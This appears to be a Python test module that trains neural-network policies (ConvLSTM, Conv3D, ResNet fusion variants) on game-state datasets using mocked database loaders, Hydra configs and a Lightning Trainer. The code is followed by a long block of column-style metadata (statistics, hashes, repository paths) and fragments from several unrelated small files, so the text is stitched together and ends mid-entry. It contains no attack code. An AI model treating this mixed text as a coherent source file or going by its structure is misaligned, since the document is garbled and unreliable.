def setup_text_dataset(self, hparams):
dataset = make_dataset(hparams.dataset)
dataset._get_states_from_db = MagicMock(side_effect=_get_text_states_from_db_se_f)
dataset._get_actions_from_db = MagicMock(side_effect=_get_text_actions_from_db_se_f)
dataset._get_chats_from_db = MagicMock(side_effect=_get_text_chats_from_db_se_f)
dataset._get_trajectories_length = MagicMock(side_effect=_get_text_nb_steps_se_f)
dataset._get_length = MagicMock(side_effect=_get_text_length_se_f)
return dataset, None
cls.setup_text_dataset = setup_text_dataset
def setUp(self):
self.folder = os.path.join(fixture_dir, str(int(time.time() * 100000000)))
def tearDown(self):
if os.path.isdir(self.folder):
shutil.rmtree(self.folder)
def test_training_soc_psql_seq_sas_convlstm(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=convlstm",
"runner/dataset=psqlseqsatos",
"runner.runner_name=SOCSupervisedSeqRunner"
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_dataset
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_psql_seq_sas_conv3d(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=conv3d",
"runner/dataset=psqlseqsatos",
"runner.runner_name=SOCSupervisedSeqRunner"
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_dataset
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_seq_conv3dpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=conv3dpolicy",
"runner/dataset=preprocessedseqsatosapolicy",
"runner.runner_name=SOCSeqPolicyRunner"
]
)
config.runner.dataset.dataset_path = _DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_seq_convlstmpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=convlstmpolicy",
"runner/dataset=preprocessedseqsatosapolicy",
"runner.runner_name=SOCSeqPolicyRunner"
]
)
config.runner.dataset.dataset_path = _DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_forward_resnet(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18",
"runner/dataset=preprocessedforwardsatosa",
"runner.runner_name=SOCSupervisedForwardRunner"
]
)
config.runner.dataset.dataset_path = _DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_forward_resnetpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18policy",
"runner/dataset=preprocessedforwardsatosapolicy",
"runner.runner_name=SOCForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_psql_forward_resnetfusionpolicy_self_attention(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18fusionpolicy",
"runner/dataset=psqltextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_text_dataset
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_psql_forward_resnetfusionpolicy_att(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18fusionpolicy",
"runner/dataset=psqltextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner",
"runner.model.self_att_fusion=false",
"runner.dataset.set_empty_text_to_zero=true",
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_text_dataset
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_forward_resnetfusionpolicy_self_attention(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18fusionpolicy",
"runner/dataset=preprocessedtextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _TEXT_BERT_DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_psql_forward_resnetmeanconcatpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18meanconcatpolicy",
"runner/dataset=psqltextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_text_dataset
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_file_forward_resnetmeanconcatpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18meanconcatpolicy",
"runner/dataset=filetextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _RAW_TEXT_BERT_DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_file_forward_resnetmeanffpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18meanffpolicy",
"runner/dataset=filetextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _RAW_TEXT_BERT_DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_file_humantrade_forward_resnetmeanffpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18meanffpolicy",
"runner/dataset=filetextberthumantradeforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _RAW_TEXT_BERT_DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.num_workers = 1
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
| 42.693878
| 99
| 0.609524
| 1,675
| 16,736
| 5.809552
| 0.113433
| 0.041928
| 0.019525
| 0.024458
| 0.7881
| 0.780084
| 0.743911
| 0.722125
| 0.709382
| 0.637036
| 0
| 0.005631
| 0.289077
| 16,736
| 391
| 100
| 42.803069
| 0.812237
| 0.006393
| 0
| 0.564327
| 0
| 0
| 0.171839
| 0.111693
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076023
| false
| 0
| 0.040936
| 0.01462
| 0.149123
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
85c47c850d97ede05f08346a4ba158dab2d66968
| 155
|
py
|
Python
|
aitu_data_extractors/routers/base.py
|
Toffooo/aituio
|
a4382f2d857cf8a5dd3b44bbc5fa93203c2eec28
|
[
"MIT"
] | null | null | null |
aitu_data_extractors/routers/base.py
|
Toffooo/aituio
|
a4382f2d857cf8a5dd3b44bbc5fa93203c2eec28
|
[
"MIT"
] | null | null | null |
aitu_data_extractors/routers/base.py
|
Toffooo/aituio
|
a4382f2d857cf8a5dd3b44bbc5fa93203c2eec28
|
[
"MIT"
] | null | null | null |
from aitu_data_extractors.utils import read_json
from settings import ABS_PATH
LINKS = read_json(f"{ABS_PATH}/aitu_data_extractors/Resources/links.json")
| 31
| 74
| 0.845161
| 25
| 155
| 4.92
| 0.56
| 0.130081
| 0.292683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077419
| 155
| 4
| 75
| 38.75
| 0.86014
| 0
| 0
| 0
| 0
| 0
| 0.335484
| 0.335484
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
85c5fb40a8ee980e1d09db854f36914e17733145
| 116
|
py
|
Python
|
tests/test_dummy.py
|
clbarras/pyannote-audio
|
f70ce115022b64572bb5895e21088f4ae1023737
|
[
"MIT"
] | 1
|
2020-02-24T04:30:14.000Z
|
2020-02-24T04:30:14.000Z
|
tests/test_dummy.py
|
gitkob/pyannote-audio
|
73c4fe7311d4a1314f18c11fea60aca6bc7e5359
|
[
"MIT"
] | null | null | null |
tests/test_dummy.py
|
gitkob/pyannote-audio
|
73c4fe7311d4a1314f18c11fea60aca6bc7e5359
|
[
"MIT"
] | null | null | null |
import pytest
from pyannote.core import Segment
def test_dummy():
assert isinstance(Segment(1., 2.), Segment)
| 16.571429
| 47
| 0.741379
| 16
| 116
| 5.3125
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020408
| 0.155172
| 116
| 6
| 48
| 19.333333
| 0.846939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
a41bfd6e9601e27dd87391af7a4209c13b0ee4e9
| 90
|
py
|
Python
|
examples/grid-compute/scripts/example.py
|
diaperrash/cloudify-azure-plugin
|
dc495c294931168b012b60427e36e5a0738f2292
|
[
"Apache-2.0"
] | 2
|
2018-08-16T01:50:35.000Z
|
2018-11-17T20:31:37.000Z
|
examples/grid-compute/scripts/example.py
|
diaperrash/cloudify-azure-plugin
|
dc495c294931168b012b60427e36e5a0738f2292
|
[
"Apache-2.0"
] | 43
|
2017-05-18T12:31:42.000Z
|
2019-01-08T09:20:42.000Z
|
examples/grid-compute/scripts/example.py
|
diaperrash/cloudify-azure-plugin
|
dc495c294931168b012b60427e36e5a0738f2292
|
[
"Apache-2.0"
] | 13
|
2015-07-09T10:49:55.000Z
|
2021-05-06T09:24:30.000Z
|
from cloudify import ctx
ctx.logger.info('Hello, my instance ID is %s', ctx.instance.id)
| 22.5
| 63
| 0.744444
| 16
| 90
| 4.1875
| 0.75
| 0.298507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 90
| 3
| 64
| 30
| 0.858974
| 0
| 0
| 0
| 0
| 0
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
a42ff4c15610b76a6f401465dcfbfeb61d1211bf
| 127
|
py
|
Python
|
gltbx/glu.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
gltbx/glu.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
gltbx/glu.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from __future__ import division
import boost.python
ext = boost.python.import_ext("gltbx_glu_ext")
from gltbx_glu_ext import *
| 25.4
| 46
| 0.826772
| 20
| 127
| 4.8
| 0.45
| 0.229167
| 0.229167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102362
| 127
| 4
| 47
| 31.75
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0.102362
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
f10a8bd185573250976b7d75465158a8be8ab862
| 192
|
py
|
Python
|
exercicios/lista1/exercicio27.py
|
lagcrs/algoritmos
|
5ee860c71db8ac2ef8bbe6cc87726938b1ca9c72
|
[
"Apache-2.0"
] | null | null | null |
exercicios/lista1/exercicio27.py
|
lagcrs/algoritmos
|
5ee860c71db8ac2ef8bbe6cc87726938b1ca9c72
|
[
"Apache-2.0"
] | null | null | null |
exercicios/lista1/exercicio27.py
|
lagcrs/algoritmos
|
5ee860c71db8ac2ef8bbe6cc87726938b1ca9c72
|
[
"Apache-2.0"
] | null | null | null |
diagonal_maior = float(input('Diagonal maior: '))
diagonal_menor = float(input('Diagonal menor: '))
area = (diagonal_maior * diagonal_menor) / 2
print(f'Area de um losango: {area:.2f}')
| 32
| 50
| 0.697917
| 26
| 192
| 5
| 0.5
| 0.3
| 0.276923
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012195
| 0.145833
| 192
| 6
| 51
| 32
| 0.780488
| 0
| 0
| 0
| 0
| 0
| 0.329787
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f1204e27c390f944e1df97a84347e2c18478915b
| 128
|
py
|
Python
|
upf_to_json/__init__.py
|
simonpintarelli/upf_to_json
|
498c0591a0383b1642f6c5321b36e688d4b971d3
|
[
"BSD-2-Clause"
] | 2
|
2019-11-10T05:18:16.000Z
|
2020-11-27T08:16:43.000Z
|
upf_to_json/__init__.py
|
simonpintarelli/upf_to_json
|
498c0591a0383b1642f6c5321b36e688d4b971d3
|
[
"BSD-2-Clause"
] | null | null | null |
upf_to_json/__init__.py
|
simonpintarelli/upf_to_json
|
498c0591a0383b1642f6c5321b36e688d4b971d3
|
[
"BSD-2-Clause"
] | 2
|
2020-11-28T00:06:13.000Z
|
2022-01-20T19:46:34.000Z
|
""" UPF converter """
from __future__ import absolute_import
from .upf_to_json import upf_to_json
__all__ = ('upf_to_json',)
| 16
| 38
| 0.757813
| 19
| 128
| 4.315789
| 0.473684
| 0.182927
| 0.329268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 128
| 7
| 39
| 18.285714
| 0.745455
| 0.101563
| 0
| 0
| 0
| 0
| 0.102804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
f12c1065c7ea77e833a4a9617d901de45af17d4b
| 221
|
py
|
Python
|
cfg/audio/__main__.py
|
rr-/dotfiles
|
4a684c43a5714a3312b42b445e5ba9ae1fab0d1a
|
[
"MIT"
] | 16
|
2015-06-05T12:57:44.000Z
|
2021-08-05T23:49:42.000Z
|
cfg/audio/__main__.py
|
rr-/dotfiles
|
4a684c43a5714a3312b42b445e5ba9ae1fab0d1a
|
[
"MIT"
] | 6
|
2015-11-01T18:18:26.000Z
|
2020-10-06T09:17:29.000Z
|
cfg/audio/__main__.py
|
rr-/dotfiles
|
4a684c43a5714a3312b42b445e5ba9ae1fab0d1a
|
[
"MIT"
] | 6
|
2015-10-31T18:53:12.000Z
|
2020-11-30T18:03:06.000Z
|
from libdotfiles.packages import try_install
from libdotfiles.util import run
try_install("alsa-utils")
try_install("pulseaudio")
try_install("pulseaudio-bluetooth")
try_install("pavucontrol")
run(["pulseaudio", "-D"])
| 22.1
| 44
| 0.791855
| 28
| 221
| 6.071429
| 0.5
| 0.294118
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072398
| 221
| 9
| 45
| 24.555556
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0.285068
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.285714
| 0
| 0.285714
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f15741d2ac34d48affedc902127162369de64ee0
| 1,557
|
py
|
Python
|
terrascript/resource/cappyzawa/artifactory.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/resource/cappyzawa/artifactory.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/resource/cappyzawa/artifactory.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/resource/cappyzawa/artifactory.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:11:58 UTC)
import terrascript
class artifactory_access_token(terrascript.Resource):
pass
class artifactory_api_key(terrascript.Resource):
pass
class artifactory_certificate(terrascript.Resource):
pass
class artifactory_group(terrascript.Resource):
pass
class artifactory_local_repository(terrascript.Resource):
pass
class artifactory_permission_target(terrascript.Resource):
pass
class artifactory_permission_targets(terrascript.Resource):
pass
class artifactory_remote_repository(terrascript.Resource):
pass
class artifactory_replication_config(terrascript.Resource):
pass
class artifactory_single_replication_config(terrascript.Resource):
pass
class artifactory_user(terrascript.Resource):
pass
class artifactory_virtual_repository(terrascript.Resource):
pass
class artifactory_xray_policy(terrascript.Resource):
pass
class artifactory_xray_watch(terrascript.Resource):
pass
__all__ = [
"artifactory_access_token",
"artifactory_api_key",
"artifactory_certificate",
"artifactory_group",
"artifactory_local_repository",
"artifactory_permission_target",
"artifactory_permission_targets",
"artifactory_remote_repository",
"artifactory_replication_config",
"artifactory_single_replication_config",
"artifactory_user",
"artifactory_virtual_repository",
"artifactory_xray_policy",
"artifactory_xray_watch",
]
| 19.961538
| 73
| 0.788696
| 157
| 1,557
| 7.464968
| 0.261147
| 0.243174
| 0.274744
| 0.31058
| 0.511092
| 0.311433
| 0.095563
| 0
| 0
| 0
| 0
| 0.008935
| 0.137444
| 1,557
| 77
| 74
| 20.220779
| 0.863738
| 0.075145
| 0
| 0.311111
| 1
| 0
| 0.248434
| 0.212248
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.311111
| 0.022222
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
f16d66e060ce8ff7bbafc50ed1b21e61fe34f779
| 144
|
py
|
Python
|
demoproject/demoproject/templatetags/demo_tags.py
|
tickettext/django-nvd3
|
76656b24a4d028cb4ee2231d1487b5ec70c42203
|
[
"MIT"
] | 1
|
2015-11-26T17:44:47.000Z
|
2015-11-26T17:44:47.000Z
|
demoproject/demoproject/templatetags/demo_tags.py
|
Star2Billing/django-nvd3
|
8184561dfc45287200692c10e7dcedc8a8cbccb1
|
[
"MIT"
] | null | null | null |
demoproject/demoproject/templatetags/demo_tags.py
|
Star2Billing/django-nvd3
|
8184561dfc45287200692c10e7dcedc8a8cbccb1
|
[
"MIT"
] | null | null | null |
#from django import template
from django.template.defaultfilters import register
@register.filter
def demo(value):
return 'demo-' + value
| 18
| 51
| 0.770833
| 18
| 144
| 6.166667
| 0.611111
| 0.18018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 144
| 7
| 52
| 20.571429
| 0.902439
| 0.1875
| 0
| 0
| 0
| 0
| 0.043103
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
f16f3bcc643b5dc9e0eb4cb54d22fd772e3ba3d0
| 36
|
py
|
Python
|
tests/__init__.py
|
stcstores/scurri
|
10b5358df45a74188f8a0744842b28b6e7f6c15a
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
stcstores/scurri
|
10b5358df45a74188f8a0744842b28b6e7f6c15a
|
[
"MIT"
] | 13
|
2021-09-22T01:22:15.000Z
|
2022-03-21T01:31:18.000Z
|
tests/__init__.py
|
stcstores/scurri
|
10b5358df45a74188f8a0744842b28b6e7f6c15a
|
[
"MIT"
] | null | null | null |
"""Tests for the scurri library."""
| 18
| 35
| 0.666667
| 5
| 36
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 36
| 1
| 36
| 36
| 0.774194
| 0.805556
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f185929589762f5ef780aab877bb29f23d3b32d6
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/requests_toolbelt/auth/_digest_auth_compat.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/requests_toolbelt/auth/_digest_auth_compat.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/requests_toolbelt/auth/_digest_auth_compat.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/25/aa/6e/d2ef0ac15dc815b462126cebc5547a33120d9e999b3d8784ab287fcdb3
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.395833
| 0
| 96
| 1
| 96
| 96
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f18f24b75542d81574b224367a62288f34d26b31
| 164
|
py
|
Python
|
python_data_utils/__init__.py
|
surajiyer/python-data-utils
|
d6e9bf81204a01545a3edb165c5724eb24f37c18
|
[
"MIT"
] | 4
|
2019-01-06T00:09:21.000Z
|
2022-01-28T06:03:13.000Z
|
python_data_utils/__init__.py
|
surajiyer/python-data-utils
|
d6e9bf81204a01545a3edb165c5724eb24f37c18
|
[
"MIT"
] | null | null | null |
python_data_utils/__init__.py
|
surajiyer/python-data-utils
|
d6e9bf81204a01545a3edb165c5724eb24f37c18
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
description: Python data utility functions and classes
author: Suraj Iyer
"""
from .about import __version__
from . import decorators
| 16.4
| 58
| 0.719512
| 20
| 164
| 5.7
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007634
| 0.20122
| 164
| 9
| 59
| 18.222222
| 0.862595
| 0.536585
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
74e6d561991ae6d2f456ac60615af15a775b44bb
| 81
|
py
|
Python
|
aiohttp_aiocache/__init__.py
|
nobbynobbs/aiohttp-aiocache
|
316bb6ce0269757848de9055a53c35cda0da71c4
|
[
"MIT"
] | 2
|
2020-10-16T04:05:44.000Z
|
2021-02-19T18:59:56.000Z
|
aiohttp_aiocache/__init__.py
|
nobbynobbs/aiohttp-aiocache
|
316bb6ce0269757848de9055a53c35cda0da71c4
|
[
"MIT"
] | null | null | null |
aiohttp_aiocache/__init__.py
|
nobbynobbs/aiohttp-aiocache
|
316bb6ce0269757848de9055a53c35cda0da71c4
|
[
"MIT"
] | null | null | null |
from ._api import cached, register_cache
__all__ = ["cached", "register_cache"]
| 20.25
| 40
| 0.753086
| 10
| 81
| 5.4
| 0.7
| 0.518519
| 0.703704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123457
| 81
| 3
| 41
| 27
| 0.760563
| 0
| 0
| 0
| 0
| 0
| 0.246914
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
2d2b418599defab31d746f21556f44eb5f50b92f
| 61,203
|
py
|
Python
|
interpret_eval/tasks/src/errorAnalysis.py
|
Tahmid04/ExplainaBoard
|
640052f84c0cb61c12e0952fb3c435b3f926f6ab
|
[
"MIT"
] | null | null | null |
interpret_eval/tasks/src/errorAnalysis.py
|
Tahmid04/ExplainaBoard
|
